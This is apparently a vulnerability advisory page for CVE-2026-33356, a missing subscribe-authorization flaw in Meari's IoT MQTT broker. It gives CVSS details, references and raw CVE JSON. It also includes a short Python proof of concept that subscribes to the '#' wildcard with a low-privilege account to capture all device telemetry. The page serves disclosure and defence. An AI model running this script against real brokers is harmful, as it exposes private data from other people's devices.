Security Vulnerability Report
CVE-2026-33356 CVSS 7.7 HIGH

CVE-2026-33356

Published: 2026-05-11 17:16:31
Last Modified: 2026-05-11 17:16:31
Source: 44488dab-36db-4358-99f9-bc116477f914

Description

In Meari IoT Cloud MQTT Broker deployments running EMQX 4.x, any authenticated low-privilege account can subscribe to global wildcard topics and receive telemetry from devices the user does not own. The broker enforces publish restrictions but does not enforce equivalent subscribe authorization at per-device scope.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No structured configuration data available. Affected product as stated in the description:

Meari IoT Cloud MQTT Broker (EMQX 4.x)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import time
import paho.mqtt.client as mqtt

# Configuration (paho-mqtt 1.x client API assumed; 2.x requires a callback_api_version argument)
BROKER_ADDRESS = "mqtt.meari.example.com"
PORT = 1883
USERNAME = "low_priv_user"
PASSWORD = "password123"

# Callback when message is received
def on_message(client, userdata, message):
    print(f"Topic: {message.topic}\nMessage: {message.payload.decode()}")

# Initialize client
client = mqtt.Client("AttackerClient")
client.username_pw_set(USERNAME, PASSWORD)
client.on_message = on_message

# Connect to broker
print("Connecting to broker...")
client.connect(BROKER_ADDRESS, PORT)

# Start the network loop in a background thread
client.loop_start()

# Subscribe to global wildcard to capture all telemetry
# This exploits the missing subscribe authorization
print("Subscribing to wildcard topic '#'")
client.subscribe("#", qos=0)

try:
    while True:
        time.sleep(1)  # idle; messages are delivered via on_message
except KeyboardInterrupt:
    client.loop_stop()
    client.disconnect()

References

https://github.com/xn0tsa/nobody-puts-baby-in-a-corner
https://www.runzero.com/advisories/meari-mqtt-broker-missing-per-device-subscribe-acl-cve-2026-33356/

Weakness: CWE-639
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33356",
    "sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914",
    "published": "2026-05-11T17:16:30.590",
    "lastModified": "2026-05-11T17:16:30.590",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In Meari IoT Cloud MQTT Broker deployments running EMQX 4.x, any authenticated low-privilege account can subscribe to global wildcard topics and receive telemetry from devices the user does not own. The broker enforces publish restrictions but does not enforce equivalent subscribe authorization at per-device scope."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "44488dab-36db-4358-99f9-bc116477f914",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "44488dab-36db-4358-99f9-bc116477f914",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/xn0tsa/nobody-puts-baby-in-a-corner",
        "source": "44488dab-36db-4358-99f9-bc116477f914"
      },
      {
        "url": "https://www.runzero.com/advisories/meari-mqtt-broker-missing-per-device-subscribe-acl-cve-2026-33356/",
        "source": "44488dab-36db-4358-99f9-bc116477f914"
      }
    ]
  }
}